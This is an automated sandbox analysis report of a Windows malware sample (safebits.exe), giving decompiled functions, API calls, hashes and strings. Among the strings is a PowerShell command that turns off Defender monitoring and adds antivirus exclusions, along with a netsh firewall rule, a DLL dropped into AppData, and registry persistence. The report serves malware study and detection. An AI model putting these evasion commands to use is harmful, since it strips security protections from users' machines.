                                                                • Associated: 0000000D.00000002.811136166.0000000000446000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811154545.000000000044A000.00000040.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID:
                                                                • String ID: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe$Set-MpPreference -DisableBehaviorMonitoring $true ; Set-MpPreference -MAPSReporting 0 ; Set-MpPreference -ExclusionProcess rundll32.exe ; Set-MpPreference -ExclusionExtension dll$jdfddn$netsh.exe$open$setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe"$system32\WindowsPowershell\v1.0\powershell.exe
                                                                • API String ID: 0-3903124303
                                                                • Opcode ID: 3b5f3102be3a5c2b6ad2516d9c7cb8dff5ad41469834a22de65043ea401f9948
                                                                • Instruction ID: f82359284f8132bfcf2921efccf0bb16aaf7385792bbad63a148d7396f49b813
                                                                • Opcode Fuzzy Hash: 3b5f3102be3a5c2b6ad2516d9c7cb8dff5ad41469834a22de65043ea401f9948
                                                                • Instruction Fuzzy Hash: A28178A584E3C04FD3039BB19965A903FB19F17215F1E41EBD080EF6E3D6AC591AC72A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00401218, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 28stringthreadCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 89%
                                                                			E00401218(void* __eax, CHAR* __edx) {
				void* _t5;
				CHAR* _t11;

				_t11 = __edx;
				if(__eax > 5 && __eax > 1) {
					GetWindowsDirectoryA("C:\Users\jones\AppData\Local\Temp\cyscuq0veku\safebits.exe", 0x3e8);
					if( *((char*)(lstrlenA(?str?) - 1 + 0x44039c)) != 0x5c) {
						lstrcatA("C:\Users\jones\AppData\Local\Temp\cyscuq0veku\safebits.exe", "\\system32\\WindowsPowershell\\v1.0\\powershell.exe");
					} else {
						lstrcatA("C:\Users\jones\AppData\Local\Temp\cyscuq0veku\safebits.exe", "system32\\WindowsPowershell\\v1.0\\powershell.exe");
					}
				}
				 *0x43f5c2 = 1;
				ExitThread(0); // executed
				_t5 = OpenMutexA(0x100000, 0, _t11);
				if(_t5 != 0) {
					ExitProcess();
					return _t5;
				}
				return _t5;
			}





                                                                0x00401218
                                                                0x0040121a
                                                                0x0040122b
                                                                0x00401242
                                                                0x0040125f
                                                                0x00401244
                                                                0x0040124e
                                                                0x0040124e
                                                                0x00401242
                                                                0x00401264
                                                                0x0040126d
                                                                0x00401280
                                                                0x00401282
                                                                0x00401284
                                                                0x00000000
                                                                0x00401284
                                                                0x00401289

                                                                APIs
                                                                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,000003E8), ref: 0040122B
                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,000003E8), ref: 00401235
                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,system32\WindowsPowershell\v1.0\powershell.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,000003E8), ref: 0040124E
                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,\system32\WindowsPowershell\v1.0\powershell.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,000003E8), ref: 0040125F
                                                                • ExitThread.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,\system32\WindowsPowershell\v1.0\powershell.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,000003E8), ref: 0040126D
                                                                • OpenMutexA.KERNEL32 ref: 0040127B
                                                                • ExitProcess.KERNEL32(00100000,00000000,UEFIConfig,004012FD,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000), ref: 00401284
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811078300.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000D.00000002.811102499.000000000043C000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811121010.0000000000443000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811136166.0000000000446000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811154545.000000000044A000.00000040.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: Exitlstrcat$DirectoryMutexOpenProcessThreadWindowslstrlen
                                                                • String ID: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe$UEFIConfig$system32\WindowsPowershell\v1.0\powershell.exe
                                                                • API String ID: 3418033457-1397626661
                                                                • Opcode ID: 16ad6863a522af516c56e882266bdbc084bb6eac1fce67c8e9af8491253d9714
                                                                • Instruction ID: 5f815505bf830127fa623745a4342035234a376669614b7acbac926b9fd7e61f
                                                                • Opcode Fuzzy Hash: 16ad6863a522af516c56e882266bdbc084bb6eac1fce67c8e9af8491253d9714
                                                                • Instruction Fuzzy Hash: 4EE09250AB43C0A5FA2137B50CCBFAD0985474DF0AF5420AFBA82B45E2C6FC0551462E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0046E9E8, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 146memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetErrorMode.KERNELBASE(00000002), ref: 0046EA5B
                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0046EADF
                                                                • ShellExecuteEx.SHELL32(0000003C), ref: 0046EBBC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811171169.000000000044B000.00000020.00020000.sdmp, Offset: 0044B000, based on PE: false
                                                                Similarity
                                                                • API ID: AllocErrorExecuteModeShellVirtual
                                                                • String ID: 55235235$<$c:\windows\hh.exe${
                                                                • API String ID: 1049021307-292853099
                                                                • Opcode ID: 21797e6639d023dd5397f78846b2e0d1a48e08e216e9724ca8d2ff4dd303e3d0
                                                                • Instruction ID: 25ad65df9d6a0f3725208dde777aa6ccf33968de0a166632d6b3194e64fc11cd
                                                                • Opcode Fuzzy Hash: 21797e6639d023dd5397f78846b2e0d1a48e08e216e9724ca8d2ff4dd303e3d0
                                                                • Instruction Fuzzy Hash: 41519074E002099FDF40DFA9D982ADEBBF1BF08308F10456AE515F7291E778AD418B59
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00463BBC, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadIconA.USER32(004CA030,MAINICON,?,?,?,004509E0), ref: 00463CA1
                                                                • CharLowerA.USER32(?,?,?,?,004509E0), ref: 00463D26
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811171169.000000000044B000.00000020.00020000.sdmp, Offset: 0044B000, based on PE: false
                                                                Similarity
                                                                • API ID: CharIconLoadLower
                                                                • String ID: MAINICON
                                                                • API String ID: 2462297155-2283262055
                                                                • Opcode ID: 13abcb459b5e2e0001c5f9118904a3cc0a52d628095c313acc00973a016e5726
                                                                • Instruction ID: bed1c1fe19d00a89edf3358992f0b46661f9e0ec64f4575b7bd2127a7c7afb8f
                                                                • Opcode Fuzzy Hash: 13abcb459b5e2e0001c5f9118904a3cc0a52d628095c313acc00973a016e5726
                                                                • Instruction Fuzzy Hash: 1E5141706042849FDB50DF29D8C5B857BE4AB15308F0480FAE848DF397EBB9D948CB69
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00402A3B, Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 37%
                                                                			E00402A3B() {

				 *0x00000000 =  *0x00000000;
				asm("jecxz 0xffffffc3");
				asm("loope 0x5");
				return 0;
			}



                                                                0x00402a3d
                                                                0x00402a3f
                                                                0x00402a41
                                                                0x00402a43

                                                                APIs
                                                                • OpenProcessToken.ADVAPI32(000000FF,00000008,00447223,004011A7), ref: 00402A04
                                                                • GetTokenInformation.ADVAPI32(00000019,004473AF(TokenIntegrityLevel),00001388,00447227,000000FF,00000008,00447223,004011A7), ref: 00402A24
                                                                • ExitProcess.KERNEL32(kernel32,ProductName,00000000,00443400,Windows 10 Enterprise,00440394,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,00440398,-00000006,00000000,036A1428,003F1319,00401FDD), ref: 00402A4B
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811078300.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000D.00000002.811102499.000000000043C000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811121010.0000000000443000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811136166.0000000000446000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811154545.000000000044A000.00000040.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: ProcessToken$ExitInformationOpen
                                                                • String ID:
                                                                • API String ID: 1178380199-0
                                                                • Opcode ID: e517496335aaad7309d94258a417eeb5ccc56516b6741c23f993a4ef706d3ca4
                                                                • Instruction ID: c5ecccfb6f3af2e53d24722a026b95e832120dd5f1a89c2c25cf70eb79a9e780
                                                                • Opcode Fuzzy Hash: e517496335aaad7309d94258a417eeb5ccc56516b6741c23f993a4ef706d3ca4
                                                                • Instruction Fuzzy Hash: 46E06834B882000ADE206B119C878123751B306B00F0419F33E60F60E2DBECC822D70C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00402429, Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 86%
                                                                			E00402429() {
				CHAR* _t2;
				long _t4;

				_t2 = ShellExecuteExA(0x447267);
				if(_t2 == 0) {
					__eax = GetLastError();
					if(__eax != 2 && __eax != 3 && __esi != 0) {
					}
				}
				ExitProcess(); // executed
				CreateFileA(_t2, 0xc0000000, 3, 0, _t4, 0x80, 0); // executed
				goto __edx;
			}





                                                                0x00402433
                                                                0x00402435
                                                                0x00402437
                                                                0x0040243f
                                                                0x0040243f
                                                                0x0040243f
                                                                0x00402449
                                                                0x00402460
                                                                0x00402468

                                                                APIs
                                                                • ShellExecuteExA.SHELL32(00447267), ref: 0040242E
                                                                • GetLastError.KERNEL32(00447267), ref: 00402437
                                                                • ExitProcess.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,00000258,?,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000BB8,?,00000258,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,",xpi), ref: 00402449
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811078300.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000D.00000002.811102499.000000000043C000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811121010.0000000000443000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811136166.0000000000446000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811154545.000000000044A000.00000040.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: ErrorExecuteExitLastProcessShell
                                                                • String ID:
                                                                • API String ID: 4248680346-0
                                                                • Opcode ID: 85d97c09e9ca1cdca79a6549351a1f57cd034b0e511fa1c6fb03ab76accb3ec5
                                                                • Instruction ID: 6eb9487e8973f127cec04c9ee05d647ed62f1702ae5b4312d7b9ff9e92c22d0b
                                                                • Opcode Fuzzy Hash: 85d97c09e9ca1cdca79a6549351a1f57cd034b0e511fa1c6fb03ab76accb3ec5
                                                                • Instruction Fuzzy Hash: 42C0123158490200D93632A20ACF32B40018A8931CF68283BA002F0BE186EC4801699F
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0045FDA8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 98windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageA.USER32(00000000,00000080,00000001,00000000), ref: 0045FDE0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811171169.000000000044B000.00000020.00020000.sdmp, Offset: 0044B000, based on PE: false
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID: MDICLIENT
                                                                • API String ID: 3850602802-871263795
                                                                • Opcode ID: e9f059c30c4b5e64c70df3425483389943b1ff42c4d05aa0fae2bd08de8cad1b
                                                                • Instruction ID: 5e8175d6353c0c648ce2e21d853d34f64c58af032ef89aad77947b57623448df
                                                                • Opcode Fuzzy Hash: e9f059c30c4b5e64c70df3425483389943b1ff42c4d05aa0fae2bd08de8cad1b
                                                                • Instruction Fuzzy Hash: E231B1707442406AEB50BF794C86FAA22989B04719F14057FBD55EE2D3CA7C984C876E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0040244E, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 11fileCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E0040244E() {
				CHAR* _t1;
				long _t3;

				CreateFileA(_t1, 0xc0000000, 3, 0, _t3, 0x80, 0); // executed
				goto __edx;
			}





                                                                0x00402460
                                                                0x00402468

                                                                APIs
                                                                • CreateFileA.KERNEL32(C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll,C0000000,00000003,00000000,00000002,00000080,00000000,0040277A,kernel32,ProductName,00000000,00443400,Windows 10 Enterprise,00440394,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion), ref: 00402460
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811078300.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000D.00000002.811102499.000000000043C000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811121010.0000000000443000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811136166.0000000000446000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811154545.000000000044A000.00000040.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID: C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll
                                                                • API String ID: 823142352-3381594270
                                                                • Opcode ID: 139324e71a8c36c5130394a5df550e6d190b21a14e9d9c9e43c0df9683eb5859
                                                                • Instruction ID: ff8c075f96e07a53c4bd9049e851b07d0e2c8bcf8f5b2bcd91e448d957cd5608
                                                                • Opcode Fuzzy Hash: 139324e71a8c36c5130394a5df550e6d190b21a14e9d9c9e43c0df9683eb5859
                                                                • Instruction Fuzzy Hash: BEB092713C830138F43821305E5BF1904085340B14E31821AB341B90C065C43204011C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02A0EB40, Relevance: 3.2, APIs: 2, Instructions: 236memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 02A0EB86
                                                                • VirtualProtect.KERNELBASE(?,?,00000000), ref: 02A0EDD0
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.830628522.0000000002A0B000.00000040.00000001.sdmp, Offset: 02A0B000, based on PE: false
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID:
                                                                • API String ID: 544645111-0
                                                                • Opcode ID: 6a4e5aa6d90b8b3ed13825a8e48c3be58f940a9f27a0826dba1cadd81984fabe
                                                                • Instruction ID: c5227310105b37686d558e2656f9a7fb105ed7edb945605f366c039e245dbc60
                                                                • Opcode Fuzzy Hash: 6a4e5aa6d90b8b3ed13825a8e48c3be58f940a9f27a0826dba1cadd81984fabe
                                                                • Instruction Fuzzy Hash: ACB198B5A00209DFCB08CF84D995EAEBBB6BF88314F148558E9099B395D731E981CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00463EC4, Relevance: 3.1, APIs: 2, Instructions: 132windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageA.USER32(0000000E,00000080,00000001,00000000,?,0045BF1C), ref: 00463FF9
                                                                • KiUserCallbackDispatcher.NTDLL(0000000E,000000F2,00000000,?,0045BF1C), ref: 0046400C
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811171169.000000000044B000.00000020.00020000.sdmp, Offset: 0044B000, based on PE: false
                                                                Similarity
                                                                • API ID: CallbackDispatcherMessageSendUser
                                                                • String ID:
                                                                • API String ID: 62070635-0
                                                                • Opcode ID: c8ed50d631702e0734efd22640d8f66763db9338c46b6be01784bc4a13b8ad10
                                                                • Instruction ID: 830d196b7311f67b2d7798a962f89d43c43f17374a132fbd4a2f4d390e135460
                                                                • Opcode Fuzzy Hash: c8ed50d631702e0734efd22640d8f66763db9338c46b6be01784bc4a13b8ad10
                                                                • Instruction Fuzzy Hash: 76417471740340AFEB50EF69DC86F5637A8AB45704F54407AFA01EF2D2EA79AC40876D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0046EC20, Relevance: 3.1, APIs: 2, Instructions: 114fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetEnhMetaFileA.GDI32(0046EE34), ref: 0046EC31
                                                                • GetEnhMetaFileA.GDI32(0046EE34), ref: 0046EC3B
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811171169.000000000044B000.00000020.00020000.sdmp, Offset: 0044B000, based on PE: false
                                                                Similarity
                                                                • API ID: FileMeta
                                                                • String ID:
                                                                • API String ID: 3969797694-0
                                                                • Opcode ID: f08b476f27855627b1480933331b7e74e534c47eacd3e47a5e700b8dff369f0d
                                                                • Instruction ID: 79144a1ec193b664d7567bf7be6c47d99a2cbc132f2fda432124f98289a5e8d1
                                                                • Opcode Fuzzy Hash: f08b476f27855627b1480933331b7e74e534c47eacd3e47a5e700b8dff369f0d
                                                                • Instruction Fuzzy Hash: 5831E4B868131569D90076A3C813F2E75F95D00B0872160FBB949B51C2FBFFBA22456F
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02A0E620, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 02A0E6A4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.830628522.0000000002A0B000.00000040.00000001.sdmp, Offset: 02A0B000, based on PE: false
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID: VirtualAlloc
                                                                • API String ID: 4275171209-164498762
                                                                • Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                • Instruction ID: 57b546486f7477c2d20faf027ff1849b5dee0e48f4e04bccc6fd01175a279cc9
                                                                • Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                • Instruction Fuzzy Hash: F211BF60C082C9EEEF01D7E89549BFFBFB15F11704F044098D5842B2C2D6BA17588BB2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004029FB, Relevance: 3.0, APIs: 2, Instructions: 20COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E004029FB() {
				int _t6;
				void _t8;

				if(OpenProcessToken(0xffffffff, 8, 0x447223) == 0) {
					L3:
					return 0xffffffffffffffff;
				} else {
					_t6 = GetTokenInformation( *0x447223, 0x19, 0x4473af, 0x1388, 0x447227); // executed
					if(_t6 == 0) {
						goto L3;
					} else {
						_t8 =  *0x4473af; // 0x4473b7
						_t1 = _t8 + 8; // 0x3000
						return  *_t1 & 0x0000ffff;
					}
				}
			}





                                                                0x00402a0b
                                                                0x00402a37
                                                                0x00402a3a
                                                                0x00402a0d
                                                                0x00402a24
                                                                0x00402a2b
                                                                0x00000000
                                                                0x00402a2d
                                                                0x00402a2d
                                                                0x00402a32
                                                                0x00402a36
                                                                0x00402a36
                                                                0x00402a2b

                                                                APIs
                                                                • OpenProcessToken.ADVAPI32(000000FF,00000008,00447223,004011A7), ref: 00402A04
                                                                • GetTokenInformation.ADVAPI32(00000019,004473AF(TokenIntegrityLevel),00001388,00447227,000000FF,00000008,00447223,004011A7), ref: 00402A24
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811078300.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000D.00000002.811102499.000000000043C000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811121010.0000000000443000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811136166.0000000000446000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811154545.000000000044A000.00000040.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: Token$InformationOpenProcess
                                                                • String ID:
                                                                • API String ID: 1620003723-0
                                                                • Opcode ID: d1a2152ca6465e0457702ce36fbf15cbc0bd39cbe696fb625b4e11e6c162b277
                                                                • Instruction ID: 073d114db5adfdc9224bb139601dccd4843a10b009ba03c92ef0aeecab0c0efa
                                                                • Opcode Fuzzy Hash: d1a2152ca6465e0457702ce36fbf15cbc0bd39cbe696fb625b4e11e6c162b277
                                                                • Instruction Fuzzy Hash: E3D0127178921129EA106711AC47E227350A714B16F1409A23A50F41E1DFDCC951E618
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004027F2, Relevance: 3.0, APIs: 2, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811078300.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000D.00000002.811102499.000000000043C000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811121010.0000000000443000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811136166.0000000000446000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811154545.000000000044A000.00000040.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: _lwrite
                                                                • String ID:
                                                                • API String ID: 2358117443-0
                                                                • Opcode ID: a98772997b5cebd636563834bc2ff0b52268ae76ff9d7c2a1a51268aefee32b8
                                                                • Instruction ID: d74d011d89869e06707681ba513c0c2507c4ca50609a269aa28408732e69a808
                                                                • Opcode Fuzzy Hash: a98772997b5cebd636563834bc2ff0b52268ae76ff9d7c2a1a51268aefee32b8
                                                                • Instruction Fuzzy Hash: FDA0023D1881059BCA891FE0ED0D518FA26B68AF033D002F1F122960FCCEB806888B1E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0045F4C4, Relevance: 1.6, APIs: 1, Instructions: 148COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • KiUserCallbackDispatcher.NTDLL(00000000,00000000,00000000,0045F68A), ref: 0045F656
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811171169.000000000044B000.00000020.00020000.sdmp, Offset: 0044B000, based on PE: false
                                                                Similarity
                                                                • API ID: CallbackDispatcherUser
                                                                • String ID:
                                                                • API String ID: 2492992576-0
                                                                • Opcode ID: a6df5db8eface0c795cb8d611373b8ba130475857d65a06412feaf912d40d74d
                                                                • Instruction ID: 35fbb40646296d4b8b8e5ee90de4c5d7ccfe59de5da4f71d53db082f5123fc6f
                                                                • Opcode Fuzzy Hash: a6df5db8eface0c795cb8d611373b8ba130475857d65a06412feaf912d40d74d
                                                                • Instruction Fuzzy Hash: BD51B330A002046BDB51AF3A8985B5A37A5AF05309F44057BEC15AB3A7DA7CDC4D879E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004632B4, Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 00463354
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811171169.000000000044B000.00000020.00020000.sdmp, Offset: 0044B000, based on PE: false
                                                                Similarity
                                                                • API ID: InfoParametersSystem
                                                                • String ID:
                                                                • API String ID: 3098949447-0
                                                                • Opcode ID: 33cf023fe12c1a5044983219b0e91dc1a07c6b11317f1667649011d6917d079f
                                                                • Instruction ID: e2350e146a6b404beab9bff9c3d61726c6451968806f6f626f91476a5eff24e0
                                                                • Opcode Fuzzy Hash: 33cf023fe12c1a5044983219b0e91dc1a07c6b11317f1667649011d6917d079f
                                                                • Instruction Fuzzy Hash: AA31FC307042449BD750FF65DC42B9A37E4AB45305F8580BABD48DB3D7EE38AD488B2A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00462E04, Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadCursorA.USER32(00000000,00000000,?,?,?,0045BE44,00462A8B,?,?,00000000,?,004509CA), ref: 00462E40
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811171169.000000000044B000.00000020.00020000.sdmp, Offset: 0044B000, based on PE: false
                                                                Similarity
                                                                • API ID: CursorLoad
                                                                • String ID:
                                                                • API String ID: 3238433803-0
                                                                • Opcode ID: 82a71a33109b107e9597ac4a0d59e63066a31261b91fa2f18bcc2dda9451d79a
                                                                • Instruction ID: 64e4855b495746078dc227f559d9b9d48743bdbcd117f28f12841b37dab67070
                                                                • Opcode Fuzzy Hash: 82a71a33109b107e9597ac4a0d59e63066a31261b91fa2f18bcc2dda9451d79a
                                                                • Instruction Fuzzy Hash: CBF08221B05A04269660153E8DD0E6B7294DB91735B24033BF93EC73D1D7BB6C42419B
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0040247D, Relevance: 1.5, APIs: 1, Instructions: 20registryCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E0040247D(char* _a4, int _a8, char* _a12, int _a16) {
				long _t9;

				_t9 = RegSetValueExA( *0x4433fc, _a4, 0x8eda << 0x49 << 0x55 << 0x67, _a8, _a12, _a16); // executed
				return _t9;
			}




                                                                0x004024a7
                                                                0x004024b2

                                                                APIs
                                                                • RegSetValueExA.ADVAPI32(?,00008EDA,?,?,?,?,?,00401192,00440864,00000001,00440C4C,00000000,00440C4C,00440C4C,:*:Enabled:rundll32,00440C4C), ref: 004024A7
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811078300.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000D.00000002.811102499.000000000043C000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811121010.0000000000443000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811136166.0000000000446000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811154545.000000000044A000.00000040.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: Value
                                                                • String ID:
                                                                • API String ID: 3702945584-0
                                                                • Opcode ID: a25293c8548623f84ca04117c346fc14c8bbbd9d762087e8b2dc664fc2d28353
                                                                • Instruction ID: 3b05aa3d1854da898228568b34594d8277203aedbfe872bd4059925498695a30
                                                                • Opcode Fuzzy Hash: a25293c8548623f84ca04117c346fc14c8bbbd9d762087e8b2dc664fc2d28353
                                                                • Instruction Fuzzy Hash: 0AD01277200159BBEF055E85EC01DAA3A9FEBC9784F008035FA1199260D9B6CB21E794
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00402AD2, Relevance: 1.5, APIs: 1, Instructions: 16registryCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E00402AD2() {
				void* _t1;

				RegCreateKeyExA(_t1,  *0x4468e1, 0, 0, 0, 0xf003f, 0, 0x4433fc, 0x443400); // executed
				goto __edx;
			}




                                                                0x00402b00
                                                                0x00402b03

                                                                APIs
                                                                • RegCreateKeyExA.KERNELBASE(80000001,00000000,?,00000000,000F003F,?,004433FC,00443400,0040238B,80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{de2c9435-807b-4ef9-84e9-24af9a832065},00000000,00000000,00000000,000F003F,00000000), ref: 00402B00
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811078300.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000D.00000002.811102499.000000000043C000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811121010.0000000000443000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811136166.0000000000446000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811154545.000000000044A000.00000040.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: Create
                                                                • String ID:
                                                                • API String ID: 2289755597-0
                                                                • Opcode ID: 91d1c7fb4e1444a96c4975dc89cf13b763dcd8824fe166e283f84fb889f83331
